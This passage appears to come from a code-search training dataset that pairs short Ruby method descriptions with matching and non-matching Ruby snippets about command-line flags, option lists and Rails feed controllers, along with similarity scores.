"def normalize_flags(flags)\n if flags.is_a?(Array)\n flags.uniq.sort.join(' ')\n else\n flags\n end\n end",
"def flags\n return [] unless options[\"flags\"]\n options[\"flags\"].map do |options|\n Flag.new options\n end\n end",
"def std_flags\n # FIXME: this is bogus\n m = method(:help_text)\n boolean :help, :flag => \"h\", :doc => \"display this help\"\n boolean :verbose, :flag => \"v\", :doc => \"verbose output\"\n boolean :debug, :flag => \"D\", :doc => \"turn on debugging\"\n end",
"def format_flags(flags)\n # other flags like \"Old\" should be hidden here\n flags = flags.map {|flag| FLAGMAP[flag] || flag}\n flags.delete(\"Old\")\n if flags.delete(:Seen).nil?\n flags << '+' # unread\n end\n flags.join('')\n end",
"def effective_flags\n @effective_flags ||= flag_syntax.flat_map(&:flags)\n end",
"def to_s\n @flags.join(', ')\n end",
"def xlate_flags()\n flags = []\n flags.push('Single Connection') if (flag_single_connection?)\n flags.push('Unencrypted') if (flag_unencrypted?)\n return(flags.join(', ')) if (flags.length != 0)\n return(\"None\")\n end",
"def flags(flags)\n f = \"\"\n if (flags & Sigar::RTF_UP) != 0\n f += \"U\"\n end\n if (flags & Sigar::RTF_GATEWAY) != 0\n f += \"G\"\n end\n if (flags & Sigar::RTF_HOST) != 0\n f += \"H\"\n end\n f\n end",
"def form_flagstring(f, fall)\n\t\tflagSelectAll = (!fall.nil? && fall.to_s.downcase == \"all\")\n\t\tif(flagSelectAll || f.nil? || f.empty?)\n\t\t\tflagStr = \"all\"\n\t\telse\n\t\t\tflagStr = f.join(\"|\")\n\t\tend\n\n\t\treturn flagStr\n\tend",
"def names\n @opt_types.keys.map {|e| undasherize e }\n end",
"def flags\n # Hash#index becomes Hash#key in Ruby 1.9.\n index_method = RUBY_VERSION < '1.9' ? :index : :key\n # Map the integer @flags to array of flag symbols\n # (This may be cute but it's not very efficient!)\n [ @flags ].flatten.first.to_s(2). # extract flags as binary string\n split(//).map{ |bit| bit.to_i }. # convert to array of bits\n reverse. # reverse order to work from lsb\n inject([]) { |r,v| r << v * (1 << r.length) }. # convert each bit to decimal\n reject { |flag| flag == MAGIC_FLAGS[:none] }. # discard MAGIC_NONE flag\n map { |int_flag| MAGIC_FLAGS.send(index_method, int_flag) } # map decimal integer to symbol\n end",
"def generate_flags_flat overrides = {}\n generate_flags(overrides).map { |k, v| [k, v] }.concat(%w|--force .|).flatten\n end",
"def symbols\n @flags.keys\n end",
"def lame_flag_map\n { '--tt': :title,\n '--ta': :artist,\n '--tl': :album,\n '--ty': :year,\n '--tn': :t_num,\n '--tg': :genre }\n end",
"def whitelisted_flags\n flags.select &:allowed\n end",
"def join(seperator = \" | \")\n\t\tflags.map { |flag| flag.name }.join(seperator)\n\tend",
"def report_flags\n self.has_links? ? ret = \"L\" : ret = \"l\"\n self.has_jlinks? ? ret += \"J\" : ret += \"j\"\n self.has_form? ? ret += \"F\" : ret += \"f\"\n self.has_comments? ? ret += \"C\" : ret += \"c\"\n return ret\n end",
"def get_flags(*files)\n matches = []\n begin\n files.each do |f|\n file = File.new(f, 'r')\n while (line = file.gets)\n m = line.match(/(^.*=)?/)\n matches << m[0] if m\n end\n file.close\n end\n rescue => err\n puts 'Exception: #{err}'\n err\n end\n matches.uniq.sort!\nend",
"def literals_list\n @literals ||= \"\"\n end",
"def switches\n [short, long].map(&:to_s)\n end",
"def flags\n input = @flags.clone\n tok = []\n\n # Set the output path\n throw 'Output pathname is required' if @output.nil?\n if Platform.is_windows?\n tok.push \"/OUT:\\\"#{@output}\\\"\"\n tok.push '/DLL' if @output =~ /\\.dll/i\n else\n tok.push '-o', @output\n end\n\n # Enable shared library output\n if @shared_library\n if Platform.is_windows?\n tok.push '/DLL'\n else\n tok.push '-shared'\n tok.push '-fPIC'\n end\n end\n\n # Assume that we want to link with shared libraries\n # built within this project\n unless Platform.is_windows?\n tok.push '-L', '.'\n end\n\n # Override the normal search path for the dynamic linker\n unless @rpath.nil?\n if Platform.is_solaris?\n input.push ['R', @rpath]\n elsif Platform.is_linux?\n input.push ['-rpath', @rpath]\n elsif Platform.is_windows?\n # XXX-FIXME Windows does not support the rpath concept\n else\n throw 'Unsupported OS'\n end\n input.push ['-L', @rpath]\n end\n\n input.each do |f|\n if @gcc_flags == true\n if f.kind_of?(Array)\n if f[0] == '-L'\n tok.push f.join(' ')\n else\n tok.push '-Wl,' + f[0] + ',' + f[1]\n end\n else\n tok.push '-Wl,' + f\n end\n else\n if f.kind_of?(Array)\n tok.push f.flatten.join(' ')\n else\n tok.push f\n end\n end\n end\n\n res = ' ' + tok.join(' ')\n return res\n end",
"def flags\n @flags ||= Set.new([])\n end",
"def strings\n [\n build_identification_string,\n build_flags_string,\n build_info_string,\n build_name_string\n ].compact\n end",
"def flags=(flags)\n self.flag_attr = flags.map{|flag| flag.to_s}.join(\", \");\n end",
"def options # :nodoc:\n [].tap do |o|\n o << \"Lazy\" if lazy?\n o << \"Reverse\" if reverse?\n o << \"Exclude [#{all_excluded_words.join(\", \")}]\" if excluded_words.any?\n o << \"No Options\" if o.empty?\n end\n end",
"def valid_options\n %i(\n\n ) # end array\n end",
"def elementary_flag_names\n flagset_builder.elementary_flag_names\n end",
"def thor_options_to_optparse\n flags = []\n %i[color progress debug interactive].each do |option|\n if options[option] then flags << \"--#{option}\"\n else flags << \"--no-#{option}\"\n end\n end\n flags\n end",
"def make_list(options)\n list = []\n to_switches(options).split(\" \").each do |a|\n list << a.gsub('\"', \"\")\n end\n list\n end",
"def default_flags\n cflags = []\n\n # GCC on Solaris 10 produces 32-bit code by default, so add -m64\n # when running in 64-bit mode.\n if Platform.is_solaris? and Platform.word_size == 64\n cflags.push '-m64'\n end\n\n cflags\n end",
"def flagging\n @title = 'Flags and their meaning'\n @css = 'flags.css'\n end",
"def format_flag(flag)\n if flag.length == 1\n \" -#{flag}\"\n else\n \" --#{flag.to_s.tr('_', '-')}\"\n end\n end",
"def extract_flags\n @flags.clear\n rules.each_with_index do |r, i|\n @flags << i unless r.alternatives.size == 1\n end\n end",
"def get #:nodoc:\n p = Array.new\n p.push(@long_form)\n p.push(@short_form) if @short_form != \"\"\n p.push(@arg_flag)\n return p\n end",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def valid_options\n self::OPTIONS.map(&:to_s).join(', ')\n end",
"def option_names\n standard_option_names\nend",
"def parse_flags(msg)\n msg.scan(/-(\\w+)\\s*([^-]+)?/)\n .uniq{ |e| e[0] }\n .map{ |k, v| [k, v.nil? ? nil : v.squish] }\n .to_h\n .symbolize_keys\nend",
"def normalize_package_conf_content(name, flags = nil)\n [ name, normalize_flags(flags) ].join(' ')\n end",
"def resolve_flag(str)\n result = Flag::Resolution.new(str)\n flags.each do |flag_def|\n result.merge!(flag_def.resolve(str))\n end\n result\n end",
"def syntax\n t = @cmd_args\n t = [[t]] if !t.is_a? Array\n\n args = [] \n count = 0\n t.each do |expected_array|\n count += 1\n if count == 1\n str = \"Syntax: #{@cmd_name}\"\n else\n str = \" #{@cmd_name}\"\n end\n expected_array.each do |expected|\n # each expected arg.\n str += case expected\n when :arg_none then \"\"\n when :arg_dir! then \" <direction>\"\n when :arg_str! then \" <string literal>\"\n when :arg_word!then \" <word>\"\n when :arg_int! then \" <#>\"\n when :arg_obj_inv! then \" <item>\"\n when :arg_obj_room! then \" <item>\"\n when :arg_obj_inv_or_room! then \" <item>\"\n when :arg_class! then \" <Class>\"\n when :arg_player_in_game! then \" <player in game>\"\n when :arg_player_offline! then \" <any player>\"\n when :arg_actor_room! then \" <npc/player>\"\n when String then \" \" + expected \n else \"\"\n \n end\n end \n args << str\n end\n return args\n end",
"def to_s\n\t\tmap { |k,v|\n\t\t\tv.to_s + \" ::= \" + v.rules.map { |r| r.map{|e| e.inspect}.join(\" \") }.join(\" | \")\n\t\t}.join(\"\\n\")\n\tend",
"def for_option_parser\n [short, long, return_type, description].flatten.reject{ |o| o.to_s.empty? }\n end",
"def flags(path)\n if @manifest_entry ||= nil\n return manifest_entry.flags[path] || \"\"\n end\n pnode = parents[0].raw_changeset[0]\n \n orig = @repo.dirstate.copy_map[path] || path\n node, flag = @repo.manifest.find(pnode, orig)\n return @repo.dirstate.flags(@repo.working_join(path))\n end",
"def flag_to_string(flag)\n if flag.is_a?(Hash)\n flag.map do |key, value|\n \"#{flag_to_string(key)} #{value}\"\n end\n else\n str = flag.to_s\n str = \"--#{str}\" unless str.start_with?('--')\n str\n end\n end",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def extract_command_flags!(parameters)\n raw_command_flags = parameters.flatten.find_all { |arg| arg.start_with? \"--\" }\n parameters.delete_if { |param| raw_command_flags.include? param }\n\n flag_names = raw_command_flags.map { |flag| flag[/--(.+)$/,1].underscore.to_sym }\n flag_values = [ true ] * flag_names.count\n Hash[flag_names.zip(flag_values)]\n end",
"def flags(*args)\n Boxen::Flags.new *args\n end",
"def archetype_args\n tok = []\n @returns.map { |ent| tok << \"&#{ent.name}\" }\n @accepts.map { |ent| tok << ent.name }\n tok.join(', ')\n end",
"def range_all\n [ range(:upper_alphas), \n range(:lower_alphas), \n range(:numerals), \n range(:symbols_1), \n range(:symbols_2), \n range(:symbols_3), \n range(:symbols_4), \n range(:symbols_5), \n range(:symbols_6),\n range(:single_quotes),\n range(:double_quotes),\n range(:backtick) ]\n end",
"def option_list\n result = @options.dup\n result << \"-o\" << @rdoc_dir\n result << \"--main\" << main if main\n result << \"--markup\" << markup if markup\n result << \"--title\" << title if title\n result << \"-T\" << template if template\n result << '-f' << generator if generator\n result\n end",
"def to_switches(options)\n options.map do |key, value|\n case value\n when true\n \"--#{key}\"\n when Array\n \"--#{key} #{value.map { |v| v.inspect }.join(\" \")}\" unless value.empty?\n when Hash\n \"--#{key} #{value.map { |k, v| \"#{k}:#{v}\" }.join(\" \")}\" unless value.empty?\n when nil, false\n \"\"\n else\n \"--#{key} #{value.inspect}\"\n end\n end.join(\" \")\n end",
"def aliases\n @opt_aliases.keys.map {|e| undasherize e }\n end",
"def manual_description\n txt = (@flags.include?(:optional) ? '<' : '[') + @description\n if @type && @type != 'x'\n txt += _INTL(': {1}',@vararg ? '*'+type_name(@type) : type_name(@type))\n end\n txt += @flags.include?(:optional) ? '>' : ']'\n return txt\n end",
"def flag _args\n \"flag _args;\" \n end",
"def to_s(opts={})\n @registry.collect do |option|\n str = option.kind_of?(Flag) ? option.to_s(opts) : option.to_s\n str.rstrip\n end.join(\"\\n\") + \"\\n\"\n end",
"def cnf\n r = []\n @table.each {|inputs, output|\n return output.to_s if inputs.empty?\n next if output\n term = []\n each_input(inputs) {|name, input|\n if input\n term << \"!#{name}\"\n else\n term << name\n end\n }\n if term.length == 1\n r << term.join('|')\n else\n r << \"(#{term.join('|')})\"\n end\n }\n return \"true\" if r.empty?\n r.join(' & ')\n end",
"def compile_options\n str = String.new\n @options.each { |o| str = str + ' ' + o.compile }\n return str\n end",
"def test_multi_stringflag_as_strings\n opts = @p.parse %w(--xyz dog --xyz cat)\n assert_equal true, opts[:xyz_given]\n assert_equal [\"dog\",\"cat\"], opts[:xyz]\n assert_equal [], opts[:abc] # note, multi-args default to empty array\n assert_nil opts[:ghi_given]\n assert_equal [\"gg\",\"hh\"], opts[:ghi]\n end",
"def summary\n return desc.to_s.inspect unless desc.empty?\n flags.map(&:display_name).inspect\n end",
"def flags\n if variables\n (variables[:all][:referenced_enables] + variables[:all][:set_enables]).uniq.sort do |x, y|\n x = x[0] if x.is_a?(Array)\n y = y[0] if y.is_a?(Array)\n # Need to use strings for the comparison as some flags can be a string and some a symbol\n x.to_s <=> y.to_s\n end\n end\n end",
"def command_keywords\n dir_path = File.dirname(__FILE__)\n dirs = Dir.entries(dir_path)\n command_file_names = dirs.select{ |x| x.start_with?('_')}\n command_file_names.collect {|x| x.sub(/^_/, '')}\nend",
"def flags; end",
"def flag(*names)\n options = extract_options(names)\n names = [names].flatten\n\n verify_unused(names)\n flag = Flag.new(names,options)\n flags[flag.name] = flag\n\n clear_nexts\n flags_declaration_order << flag\n flag\n end",
"def optparse_args\n if short\n [\"--#{name}\", \"-#{short}\", desc, :REQUIRED]\n else\n [\"--#{name}\", desc, :REQUIRED]\n end\n end",
"def commands\n args.commands.map do |cmd|\n if cmd.respond_to?(:join)\n cmd.map { |c| c.index(' ') ? \"'#{c}'\" : c }.join(' ')\n else\n cmd.to_s\n end\n end\n end",
"def test_stringflag_as_flag\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz )\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def quotelist( *args )\n\t\t\treturn args.flatten.collect {|part| part =~ /\\s/ ? part.inspect : part}\n\t\tend",
"def flag(*names)\n names = [names].flatten\n GLI.verify_unused(names,flags,switches,\"in command #{name}\")\n flag = Flag.new(names,@next_desc,@next_arg_name,@next_default_value,@next_long_desc)\n flags[flag.name] = flag\n clear_nexts\n end",
"def switches\n [long, negative_long, short].compact\n end",
"def stow_command_flags\n flags = ''\n flags += \"-t #{stow_target}\" unless stow_target.nil?\n flags += \"-d #{stow_path}\" unless stow_path.nil?\n flags\n end",
"def pragmas\n @pragmas.keys\n end",
"def list_with_comments\n require 'method_source'\n list.map { |short| [short, public_method(\"mutate_#{short}\").comment.strip] }\n end",
"def to_s()\n result = \"@#{@text}\"\n if !@flags.empty?\n result << \".\"\n end\n @flags.each do |f|\n char = Token::FLAG_CHARACTER[f]\n if char == nil\n result << \"?\"\n else\n result << char\n end\n end\n result\n end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def raw_options(options, indent=0)\n out = []\n options.each do |option|\n out << \"#{' '*indent}#{option};\"\n end if options\n out << ''\n end",
"def flags #:nodoc:\n @flags ||= {}\n end",
"def names_to_code(names)\n str = \"\"\n names.each do |name|\n code = ATTRIBUTES[name]\n if code\n str << \"\\e[#{code}m\"\n end\n end\n str\n end",
"def hints_string\n self.hints.map { |h| \"* #{h}\\n\\n\" }.join.rstrip\n end"
] | [
"0.7066683",
"0.69394684",
"0.6563283",
"0.65382355",
"0.65382355",
"0.64747995",
"0.63405854",
"0.63405854",
"0.6232747",
"0.6224358",
"0.61657566",
"0.61653584",
"0.6146682",
"0.6134414",
"0.6115361",
"0.608132",
"0.6080026",
"0.60568523",
"0.6056155",
"0.60351515",
"0.6029136",
"0.59376484",
"0.5856771",
"0.58437055",
"0.5837118",
"0.58360755",
"0.577462",
"0.57556",
"0.5750344",
"0.5707792",
"0.56873375",
"0.56656367",
"0.5653877",
"0.5587427",
"0.5569321",
"0.5564401",
"0.55634385",
"0.5560574",
"0.55404806",
"0.5537401",
"0.5532338",
"0.55115116",
"0.54455227",
"0.54197806",
"0.53977305",
"0.53976864",
"0.5393916",
"0.5386187",
"0.5376768",
"0.530059",
"0.5274476",
"0.527121",
"0.5235502",
"0.5230955",
"0.52290267",
"0.52289313",
"0.5177591",
"0.5170268",
"0.5167578",
"0.5165599",
"0.51607347",
"0.5156462",
"0.5151979",
"0.51478016",
"0.51446664",
"0.5143977",
"0.5143977",
"0.5107589",
"0.50894845",
"0.50861806",
"0.5078543",
"0.50770676",
"0.50675625",
"0.5063641",
"0.5061155",
"0.50409234",
"0.50339186",
"0.5030336",
"0.5029823",
"0.5002074",
"0.49934652",
"0.4992855",
"0.49871862",
"0.49793187",
"0.49698675",
"0.4956207",
"0.4941967",
"0.4934463",
"0.49321532",
"0.49207258",
"0.49200547",
"0.4918227",
"0.49136418",
"0.49132073",
"0.49064693",
"0.49049333",
"0.4900268",
"0.4899239",
"0.48899308",
"0.4885283"
] | 0.8113947 | 0 |
Whether this flag is activethat is, it has a nonempty flags list. | def active?
!effective_flags.empty?
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def flags?\n !@flags.empty?\n end",
"def empty?\n flags.empty?\n end",
"def complete_flags?\n @complete_flags\n end",
"def flagged?\n !(%w(flagged) & flags).empty?\n end",
"def flagged?\n !(%w(flagged) & flags).empty?\n end",
"def is_flagged?\n return self.flags.unresolved.count > 0\n end",
"def active?\n @active.value\n end",
"def flagged?\n\t\t\t@flagged\n\t\tend",
"def active?\n @active != false\n end",
"def active?\n @_active_status ||= ( attributes.include?('active') ? !!self.active : true )\n end",
"def not_found?\n @flags.empty?\n end",
"def active?\n !!@active\n end",
"def flagged?\n @flagged\n end",
"def flagged?\n @flagged\n end",
"def active?\n @state.active?\n end",
"def complete_flag_values?\n @complete_flag_values\n end",
"def boolean\n any(true, false)\n end",
"def active?\n @active\n end",
"def active?\n @active\n end",
"def active?\n @active\n end",
"def enabled?\n state.nonzero?\n end",
"def active?\n true\n end",
"def active?\n active\n end",
"def active?\n\t\t@activation_count > 0\n\tend",
"def is_active?\n metadata[:inactive].nil? or !metadata[:inactive]\n end",
"def selectable?\n (%w(noselect) & self.flags).empty?\n end",
"def empty?\n bitmask.zero?\n end",
"def active?\n @active\n end",
"def active?\n @active\n end",
"def active?\n @active\n end",
"def active?\n true\n end",
"def active?\n @data[:active]\n end",
"def active?\n\t\tstatus == STATUSES[2]\n\tend",
"def active?\n active\n end",
"def flagged?(flag)\n self.flags.include? flag\n end",
"def flags\n @flags ||= Set.new([])\n end",
"def active?\n end",
"def active?\n end",
"def active?\n !(self.created? || self.suspended? || self.deleted? || self.closed? || self.resolved?)\n end",
"def active?\n ACTIVE_STATUSES.include?(self.status.to_sym)\n end",
"def active?\n if is_active\n return true\n else\n return false\n end\n end",
"def active?\n @active\n end",
"def active?\n\t\tactive\n\tend",
"def can_flag?\n !sent? && !flagged?\n end",
"def enemy_flag_exists?\n !(enemy_flags.empty?)\n end",
"def active?\n enabled\n end",
"def is_active(arg = nil) # rubocop: disable PredicateName\n set_or_return(:is_active, arg, kind_of: [TrueClass, FalseClass])\n end",
"def active?\n return @active\n end",
"def active?\n !activated_at.blank?\n end",
"def draft?\n !(%w(draft) & flags).empty?\n end",
"def active?\n if is_active\n return true\n else\n return false\n end\n end",
"def active?\n return false if status != :active\n !ended?\n end",
"def isActive()\n return @activationCount > 0\n end",
"def aDesActivites?\n self.activites.each do | a |\n if !a.gratuite\n return true\n end\n end\n false\n end",
"def enabled?\n any?(&:enabled?)\n end",
"def currently_active\n # check if tag is active\n if self.active == false\n return false\n end\n \n # check if time based activation is active\n if self.active_time\n unless current_time_active\n return false\n end\n end\n \n # check if date based activation is action\n if self.active_date\n unless current_date_active\n return false\n end\n end\n \n return true\n end",
"def active?\n self.internal_object['status'] == 'Active'\n end",
"def draft?\n !(%w(draft) & flags).empty?\n end",
"def active?\n 'Active' == self.status\n end",
"def active?\n self.active\n end",
"def active?\n self.active\n end",
"def active?\n\t\t\tstate == 'active'\n\t\tend",
"def active?\n active = false\n @mutex.synchronize { active = @active }\n return active\n end",
"def active?\n active\n end",
"def active?\n active\n end",
"def active?\n active\n end",
"def active?\n active\n end",
"def is_active?\n\t\tactive\n\tend",
"def pending?\r\n @activated\r\n end",
"def pending?\n @activated\n end",
"def IsActive()\r\n ret = _getproperty(1610743812, [], [])\r\n @lastargs = WIN32OLE::ARGV\r\n ret\r\n end",
"def IsActive()\r\n ret = _getproperty(1610743812, [], [])\r\n @lastargs = WIN32OLE::ARGV\r\n ret\r\n end",
"def active\n active?\n end",
"def pending?\n @activated\n end",
"def full?\n flags & 0x2 == 0x2\n end",
"def is_flagged?(feature)\n flags.include?feature\n end",
"def pending?\n @activated\n end",
"def active?\n\t\t\treturn account_life_cycle_status == ACTIVE \n\t\tend",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def active?\n !self.activated_at.nil?\n end",
"def exists_and_active?\n exists? and active?\n end",
"def is_active\n return @is_active\n end",
"def is_active\n return @is_active\n end",
"def active?\n activated == true\n end",
"def active?\n pc = PropertyChannel.active_only.find_by_property_id_and_channel_id(self.room_type.property.id, self.channel_id)\n if !pc.blank?\n # check if property is active\n if !pc.property.active?\n return false\n elsif self.disabled?\n return false\n else\n return true\n end\n else\n return false\n end\n end",
"def pending?\n @activated\n end",
"def pending?\n @activated\n end",
"def pending?\n @activated\n end",
"def pending?\n @activated\n end",
"def pending?\n @activated\n end",
"def pending?\n @activated\n end",
"def pending?\n @activated\n end",
"def found_unique?\n @flags.size == 1\n end",
"def active?\n !inactive\n end",
"def has_all_flags?(flag_names)\n flag_names.all? { |flag_name| has_flag?(flag_name) }\n end",
"def active?\n (status == ACTIVE)\n end",
"def active?\n (status == ACTIVE)\n end",
"def active?\n\t \tstatus.to_s == 'active'\n\tend",
"def active?\n true\n end"
] | [
"0.7888239",
"0.7835755",
"0.7354448",
"0.72545123",
"0.71221733",
"0.682791",
"0.6746434",
"0.6713567",
"0.66841596",
"0.6674785",
"0.66655344",
"0.6608056",
"0.6527947",
"0.6527947",
"0.6504524",
"0.65022874",
"0.64490014",
"0.64420986",
"0.64420986",
"0.64420986",
"0.64022875",
"0.639739",
"0.63872695",
"0.6380664",
"0.6378691",
"0.6378101",
"0.63744396",
"0.6372738",
"0.6372738",
"0.6372738",
"0.6362092",
"0.6358982",
"0.63556534",
"0.6353871",
"0.6347973",
"0.6344768",
"0.63368875",
"0.63368875",
"0.633218",
"0.63178355",
"0.62714595",
"0.62608105",
"0.62536603",
"0.62464285",
"0.6243773",
"0.6223576",
"0.62224585",
"0.62216735",
"0.6208574",
"0.620544",
"0.6189257",
"0.6179805",
"0.61613446",
"0.6159264",
"0.6158231",
"0.61494786",
"0.61448395",
"0.61347455",
"0.6131269",
"0.61301607",
"0.61301607",
"0.61268836",
"0.61242694",
"0.6110773",
"0.6110773",
"0.6110773",
"0.6110773",
"0.6107736",
"0.6081123",
"0.60743034",
"0.6071935",
"0.6071935",
"0.60648596",
"0.6064533",
"0.60437906",
"0.6040503",
"0.6034494",
"0.60253894",
"0.60226446",
"0.60226446",
"0.60096073",
"0.6003936",
"0.5995623",
"0.5995623",
"0.59937996",
"0.59869456",
"0.59720975",
"0.59720975",
"0.59720975",
"0.59720975",
"0.59720975",
"0.59720975",
"0.59720975",
"0.5970712",
"0.5969467",
"0.5966628",
"0.5965839",
"0.5965839",
"0.5958937",
"0.594558"
] | 0.81619895 | 0 |
GET /agencyfeed.json Get all the agency feed available | def index
@agencyfeeds = AgencyFeed.all
render :index, status: :ok
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def feeds\n all.select { |c| c.google_id =~ /^feed/ }\n end",
"def index\n @feed_sources = FeedSource.all\n end",
"def index\n @feeds = Feed.all\n end",
"def index\n @feeds = Feed.all\n end",
"def index\n @feeds = Feed.all\n end",
"def index\n @feeds = Feed.all\n end",
"def index\n @feeds = Feed.all\n end",
"def list_feeds(_environment = 'test')\n ret = http_get('feeds')\n ret.map { |f| f['id'] }\n end",
"def index\n @feeds = Feed.all\n\n # fetching a single feed\n #@feed = Feedzirra::Feed.fetch_and_parse(\"http://feeds.feedburner.com/PaulDixExplainsNothing\")\n\n # @entries = @feed.entries\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @feeds }\n end\n end",
"def feed\n get '/users/self/feed', auth_params\n end",
"def index\n @feed_infos = FeedInfo.all\n end",
"def create\n @agencyfeed = AgencyFeed.create! agencyfeed_params\n render :show, status: :created\n end",
"def fetch_urls_from_feedly\n yaml = YAML.load_file('env.yaml')\n client = Feedlr::Client.new(oauth_access_token: yaml['account']['feedly']['access_token'])\n client.user_subscriptions.map{|m|\n # puts m.id\n hotentries = client.stream_entries_contents(m.id, :count => 5 ).items\n return hotentries\n };\nend",
"def index\n @feed = Feed.new\n @feeds = Feed.all :order => :title\n \n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @feeds }\n end\n end",
"def index\n @product_feeds = ProductFeed.all\n end",
"def index\n @agencies = Agency.all\n end",
"def get_data_feeds(merchant_id)\n uri = build_uri_for(@provider, {id: merchant_id})\n http = initialize_http(uri)\n\n request = Net::HTTP::Get.new(uri.request_uri)\n JSON( http.request(request).body )['Items'] \n end",
"def index\n @feed_items = FeedItem.all\n end",
"def index\n @feed_entries = FeedEntry.all\n end",
"def index\n @user_feeds = UserFeed.find_all_by_user_id(current_user.id)\n end",
"def index\n @breast_feedings = BreastFeeding.all\n end",
"def article_feed\n \tArticle.all\n end",
"def index\n @feed_items = @user.feed_items\n render json: @feed_items\n end",
"def feed\n @articles = Article.feed_list(current_user, params[:page])\n end",
"def feed\n @bookings = Booking.find_waiting_pickup\n respond_to do |format|\n format.rss\n end\n end",
"def show\n @feed = Feed.find(params[:id])\n @related_feeds = @feed.list_related_feeds(current_user)\n @feed_entries = Entry.where(feed_id: @feed.id).order(\"updated_at DESC\").page(params[:page]).per(10)\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @feed }\n end\n end",
"def index\n @admin_agencies = Admin::Agency.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @admin_agencies }\n end\n end",
"def index\n\n response = @api.get_list({:destinationString => 'Media', :stateProvinceCode => 'PA'})\n @hotels = response.body['HotelListResponse']['HotelList']['HotelSummary']\n\n end",
"def index\n @feed_urls = current_account.feed_urls.paginate(page: params[:page]).order(id: :desc)\n end",
"def index\n if (params['feed_id'] == nil) \n @sources = current_user.sources.order(\"name ASC\")\n render \"api/sources/index\"\n return\n end\n\n feed = Feed.find_by(id: params['feed_id'])\n\n if !feed \n render json: [\"Feed does not exist\"], status: 404 \n return\n elsif feed.user_id != current_user.id\n render json: [\"You don't own this feed \"], status: 401\n return\n end\n \n @sources = feed.sources\n render \"api/sources/index\"\n end",
"def show\n @feed = Feed.find(params[:id])\n #@feeds = Feed.from_users_followed_by(current_user)\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @feed }\n end\n end",
"def show\n @agencies = Agency.find(params[:id])\n\n if @agencies \n respond_to do |format|\n format.json { render :json => @agencies }\n format.xml { render :xml => @agencies }\n end \n else\n head :not_found\n end\n end",
"def index\n @campaigns = site.campaigns.by_campaign_and_day.all\n render :json => @campaigns\n end",
"def show\n @agencies = Agency.find(params[:id])\n\n if @agencies \n respond_to do |format|\n format.json { render :json => @agencies }\n format.xml { render :xml => @agencies }\n end \n else\n head :not_found\n end\n end",
"def show\n @feed = FlexibleFeeds::Feed.find(params[:id])\n\n render json: @feed\n end",
"def feed\n @feed_items = @repository.recent_feed_items\n respond_to do |format|\n format.html # feed.html.erb\n format.json { render json: @feed_items }\n end\n end",
"def index\n @agencies = current_user.agencies.all\n end",
"def index\n @feeds = Feed.find(:all)\n\n respond_to do |format|\n format.html # index.rhtml\n format.xml { render :xml => @feeds.to_xml }\n end\n end",
"def index\n params[:feeds] = current_user.feeds.collect { |item| item.id }\n if params[:feeds].count > 0\n @articles = Article.search(params)\n else\n @articles = []\n end\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @articles }\n end\n end",
"def retrieve_feed\n uri = URI.parse(@feed_url)\n Net::HTTP.get_response(uri).body\n end",
"def index\n @registering_agencies = RegisteringAgency.all\n end",
"def friend_feed(options={})\n get('/feed', options)\n end",
"def show\n @feed = Feed.find(params[:id])\n @posts = @feed.posts.order(\"published desc\").paginate(:page => params[:page], :per_page => 20)\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @feed }\n end\n end",
"def feed\r\n @posts = Post.all(:order => \"created_at DESC\")\r\n respond_to do |format|\r\n format.rss\r\n end\r\n end",
"def index\n @feeds = Feed.by_permission\n end",
"def index\n @feed_entries = FeedEntry.all\n @title = \"Feeds List\"\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @feed_entries }\n end\n end",
"def index\n @leads = Lead.upcoming\n .includes(:updates, :agents, :agent)\n .order(created_at: :desc)\n .page(params[:page])\n .per(50)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @leads }\n end\n end",
"def index_feeds\n if @feeds.present?\n # Compose an array; each element is a hash containing the data necessary to render a feed in the JSON response\n @feeds_data = []\n @feeds.each do |feed|\n begin\n if @folder.nil?\n # If we're retrieving feeds regardless of folder, we have to find out in which folder is each feed, if any.\n folder_id = feed.user_folder(current_user)&.id || 'none'\n else\n # If we're retrieving feeds in a folder, we already know that all feeds are in this folder\n folder_id = @folder.id\n end\n\n unread_count = current_user.feed_unread_count feed\n\n data = {feed: feed, folder_id: folder_id, unread_count: unread_count}\n @feeds_data << data\n rescue NotSubscribedError => e\n # If the feed in the current iteration is no longer subscribed (e.g. because of an asynchrously running worker that has\n # unsubscribed it), just ignore it and continue with the next iteration\n Rails.logger.warn \"Listing subscribed feeds for user #{current_user.id} - #{current_user.email}, feed #{feed.id} is no longer subscribed, ignoring it\"\n end\n end\n\n respond_with @feeds_data\n else\n Rails.logger.info \"User #{current_user.id} - #{current_user.email} has no feeds to return, returning a 404\"\n head 404\n end\n end",
"def index\n @api_v1_graphs = Api::V1::Graph.all\n end",
"def challenge_feeds(challenge_id)\n # Safe max count is 500, >1000 exceeds salesforce non-admin limitation\n feeds = Challenge__Feed.query(\"parentId='#{challenge_id}' limit 500\")\n puts \"### Found #{feeds.size.to_s} Feeds\"\n return feeds\n end",
